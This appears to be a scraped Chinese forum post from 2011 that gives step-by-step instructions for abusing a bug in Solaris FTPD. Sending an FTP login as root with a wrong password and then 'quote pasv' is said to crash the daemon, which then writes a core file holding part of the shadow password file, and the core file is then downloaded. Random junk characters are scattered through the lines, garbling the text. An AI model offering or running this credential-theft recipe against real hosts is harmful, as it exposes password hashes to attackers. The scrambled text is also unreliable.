該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG�,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:
1 P7 ^$ n$ D7 r% P5 |7 O# O. i; [
- [" I& z- W* O+ Q1.通過 ftp 正常登錄到目的主機(jī)上
+ _ n, ~) w3 I' r9 H8 p3 Y/ ^. N. J2 o
2.輸入如下命令序列:# Y; r! x/ o6 t
3 d E: b- W3 T" a' T$ k) Jftp> user root wrongpasswd
* E/ o+ Q( m6 g
6 `% ]0 p5 f, ?+ x; qftp> quote pasv6 T- }% \% E! A8 e. }& _7 h/ @
5 @& P$ j* `8 ^5 v Q
3.這時(shí)�,ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�����,口令文件就包含在這個(gè)core中�。: m3 Z* ~- ~# R+ f
& v; k2 q$ z, E8 Y4.再次進(jìn)入FTP >get core9 D! v) l, S/ O
+ L! v, K: `* N2 R; ]
補(bǔ)充:雖然在core只有一部分shadow,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
" i% G1 w5 e; Z) a# `5 o) J* v& e4 L6 P5 S! J
|
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港
( 魯ICP備19052200號-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡